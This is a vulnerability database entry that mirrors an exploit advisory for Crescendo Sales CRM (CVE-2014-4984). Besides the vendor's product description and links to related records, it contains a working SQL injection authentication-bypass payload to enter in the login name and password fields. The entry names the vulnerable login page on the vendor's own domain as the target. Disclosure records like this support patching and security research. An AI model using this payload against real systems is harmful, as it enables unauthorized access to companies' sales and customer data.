Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMonendra Sahu1337DAY-ID-22507
HistoryAug 11, 2014 - 12:00 a.m.

Crescendo - Sales CRM Authentication Bypass Vulnerability

2014-08-1100:00:00
Monendra Sahu
0day.today
26

EPSS

0.019

Percentile

88.8%

JSON

Exploit for asp platform in category web applications

#################################################
Crescendo - Sales CRM Authentication Bypass Vulnerability
#################################################
 
# Exploit Title: Crescendo - Sales CRM Authentication Bypass Vulnerability (Sql Injection)
# Google Dork: N/A
# Date: July 15 , 2014
# Exploit Author: Monendra Sahu ( [emailΒ protected] )
# Vendor Homepage: http://dejavuprotech.com/crecendo.php
# Tested on:Windows
# Browser Used : Google Chrome 35
# CVE: CVE-2014-4984

Vendor Information:
 
"DΓ©jΓ  Vu has introduced Crescendo – Sales CRM. Targeted towards Small & Medium Enterprises, Crescendo is a low cost 

hosted application. Crescendo is instrumental in streamlining the sales processes like lead generation, lead tracking, lead 

management, account management and keeps top management informed about the sales pipeline. With user friendly 

interface, Crescendo comes with various MIS reports represented in tabular as well as graphical format. With the help of 

Crescendo companies can take better, faster and informed decisions. 

Crescendo - Sales CRM offers following modules:
Leads Management
Accounts Management
Contacts Management
Sales Forecasting
Pipeline Management
Teams Management
Targets Managements
Interactive Dashboards
Graphical & MIS Reports

Technologies employed for development of Crescendo - Sales CRM: 
Front End: Asp.Net, Vb.Net
Database: MSSQL Server."
 
 
#################################################
 Issue: SQL Injection, Authentication Bypass
 
Risk level: High
 
=> The remote attacker has the possibility to execute arbitrary SQL Code.
 
=> The remote attacker is able to bypass the Admin authentication.
 
Vulnerable Url : www.site.com/login.aspx
 
-------------------------------------
 
Exploit / Proof Of Concept:
 
Perform a login with the following data:

URL: http://www.crescendocrm.com/login.aspx


Login Name:1'or's'='s
Password:1'or's'='s

You will be able to successfully login into admin panel 
 
-------------------------------------
 
#################################################

#  0day.today [2018-04-04]  #

Related

packetstorm 1
nvd 1
cve 1
prion 1
cvelist 1
packetstorm
packetstorm
Crescendo - Sales CRM SQL Injection
2014-08-06 00:00:00
nvd
nvd
CVE-2014-4984
2020-01-10 13:15:12
cve
cve
CVE-2014-4984
2020-01-10 13:15:12
prion
prion
Sql injection
2020-01-10 13:15:00
cvelist
cvelist
CVE-2014-4984
2020-01-10 12:18:40

EPSS

0.019

Percentile

88.8%

JSON
Related for 1337DAY-ID-22507
packetstorm1nvd1cve1prion1cvelist1